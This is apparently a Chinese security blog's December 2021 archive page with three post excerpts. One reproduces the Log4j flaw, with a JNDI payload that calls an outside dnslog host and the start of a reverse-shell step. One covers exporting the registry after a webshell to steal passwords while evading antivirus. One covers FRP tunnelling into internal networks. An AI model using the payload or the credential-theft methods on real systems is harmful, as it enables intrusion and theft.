12 2021 档案
摘要:二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看,也可以使用burp自带的dnslog进行查看,我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显,说明存在该漏洞 2.2 反弹shel
阅读全文
摘要:一、通过reg命令导出注册表 1.1为什么要通过reg命令导出 在我们渗透内网的时候,获取了WebShell和提权之后,接下来我们就要对密码进行窃取。如果我们直接添加账户或者是上传mimikatz上去的话,往往会触发杀毒软件的拦截和安全设备告警,很容易被管理员发现。那么我们就需要通过reg命令导出来
阅读全文
摘要:一、FRP流量代理 1.1 FRP 介绍 frp是一个应用于内网穿透的反向代理工具,支持TCP\UDP\HTTP\HTTPS等协议.FRP使用的是go语言编写的,为实现我们从公网能访问到内网的服务器,WEB应用,SSH等。FRP使用的是socket代理,socket是加密通信的,类似于VPN,把公网
阅读全文
